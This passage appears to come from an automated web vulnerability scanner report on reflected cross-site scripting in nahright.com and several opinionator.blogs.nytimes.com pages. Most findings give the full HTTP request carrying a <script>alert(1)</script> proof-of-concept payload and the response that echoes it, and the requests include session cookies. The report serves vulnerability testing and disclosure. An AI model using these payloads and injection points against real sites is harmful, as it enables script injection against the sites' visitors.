The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a3bf</script><script>alert(1)</script>5635fe9c9d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/?6a3bf</script><script>alert(1)</script>5635fe9c9d9=1 HTTP/1.1
Host: nahright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=PROMIRS192.168.100.41CKOMM; path=/
Date: Sat, 13 Nov 2010 02:08:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Vary: Cookie,Accept-Encoding
X-Pingback: http://nahright.com/news/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<script>
COMSCORE.beacon({
c1:2,
c2:6685975,
c3:"",
c4:"nahright.com/news/?6a3bf</script><script>alert(1)</script>5635fe9c9d9=1",
c5:"",
c6:"",
c15:""
});
</script>
...[SNIP]...

3.173. http://opinionator.blogs.nytimes.com/2010/11/11/a-republican-for-higher-taxes/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /2010/11/11/a-republican-for-higher-taxes/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51c1"><script>alert(1)</script>380bf182eb4 was submitted in the src parameter. This input was echoed as b51c1\"><script>alert(1)</script>380bf182eb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/11/a-republican-for-higher-taxes/?src=meb51c1"><script>alert(1)</script>380bf182eb4&ref=homepage HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:09:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 64109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
Now1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=politics;law;science;domesticity;banking;the+West+Coast+;david-stockman;deficit;taxes;william-d-cohan&src=meb51c1\"><script>alert(1)</script>380bf182eb4">
...[SNIP]...

3.174. http://opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /2010/11/12/a-deficit-of-respect/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cb5b"><script>alert(1)</script>23c8535c0f2 was submitted in the src parameter. This input was echoed as 1cb5b\"><script>alert(1)</script>23c8535c0f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/a-deficit-of-respect/?src=twr1cb5b"><script>alert(1)</script>23c8535c0f2 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:08:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 72784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
CLIENTSIDE&query=qstring&keywords=politics;law;science;domesticity;banking;the+West+Coast+;alan-simpson;budget;erskine-bowles;federal-deficit;health-care-reform;social-security;taxes;the-thread&src=twr1cb5b\"><script>alert(1)</script>23c8535c0f2">
...[SNIP]...

3.175. http://opinionator.blogs.nytimes.com/2010/11/12/the-ways-of-empathy/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /2010/11/12/the-ways-of-empathy/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ea26"><script>alert(1)</script>1e6f397c31 was submitted in the src parameter. This input was echoed as 4ea26\"><script>alert(1)</script>1e6f397c31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/the-ways-of-empathy/?src=twr4ea26"><script>alert(1)</script>1e6f397c31 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:09:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 71082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
eft7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=politics;law;science;domesticity;banking;the+West+Coast+;bullying;fixes;_featured&src=twr4ea26\"><script>alert(1)</script>1e6f397c31">
...[SNIP]...

3.176. http://opinionator.blogs.nytimes.com/category/alec-soth [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/alec-soth

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62045"><script>alert(1)</script>d5bdd9c1f68 was submitted in the REST URL parameter 2. This input was echoed as 62045\"><script>alert(1)</script>d5bdd9c1f68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/alec-soth62045"><script>alert(1)</script>d5bdd9c1f68 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:22:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:22:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/alec-soth62045\"><script>alert(1)</script>d5bdd9c1f68&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.177. http://opinionator.blogs.nytimes.com/category/alec-soth/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/alec-soth/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddd1"><script>alert(1)</script>fc7205605c8 was submitted in the REST URL parameter 3. This input was echoed as bddd1\"><script>alert(1)</script>fc7205605c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/alec-soth/feedbddd1"><script>alert(1)</script>fc7205605c8/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:20:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:20:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/alec-soth/feedbddd1\"><script>alert(1)</script>fc7205605c8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.178. http://opinionator.blogs.nytimes.com/category/alec-soth/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/alec-soth/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43912"><script>alert(1)</script>d4a4c69cacb was submitted in the REST URL parameter 3. This input was echoed as 43912\"><script>alert(1)</script>d4a4c69cacb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/alec-soth/page43912"><script>alert(1)</script>d4a4c69cacb/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:22:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:22:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/alec-soth/page43912\"><script>alert(1)</script>d4a4c69cacb/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.179. http://opinionator.blogs.nytimes.com/category/allison-arieff [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/allison-arieff

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc60"><script>alert(1)</script>34ddd92904c was submitted in the REST URL parameter 2. This input was echoed as 8cc60\"><script>alert(1)</script>34ddd92904c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/allison-arieff8cc60"><script>alert(1)</script>34ddd92904c HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:16:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:16:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/allison-arieff8cc60\"><script>alert(1)</script>34ddd92904c&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.180. http://opinionator.blogs.nytimes.com/category/allison-arieff/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/allison-arieff/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd36"><script>alert(1)</script>75e2794e565 was submitted in the REST URL parameter 3. This input was echoed as 4fd36\"><script>alert(1)</script>75e2794e565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/allison-arieff/feed4fd36"><script>alert(1)</script>75e2794e565/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:12:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:12:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/allison-arieff/feed4fd36\"><script>alert(1)</script>75e2794e565&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.181. http://opinionator.blogs.nytimes.com/category/allison-arieff/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/allison-arieff/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15c39"><script>alert(1)</script>39c9a1dd378 was submitted in the REST URL parameter 3. This input was echoed as 15c39\"><script>alert(1)</script>39c9a1dd378 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/allison-arieff/page15c39"><script>alert(1)</script>39c9a1dd378/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:16:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:16:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/allison-arieff/page15c39\"><script>alert(1)</script>39c9a1dd378/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.182. http://opinionator.blogs.nytimes.com/category/dick-cavett [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/dick-cavett

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea706"><script>alert(1)</script>3b4fefc3f96 was submitted in the REST URL parameter 2. This input was echoed as ea706\"><script>alert(1)</script>3b4fefc3f96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/dick-cavettea706"><script>alert(1)</script>3b4fefc3f96 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
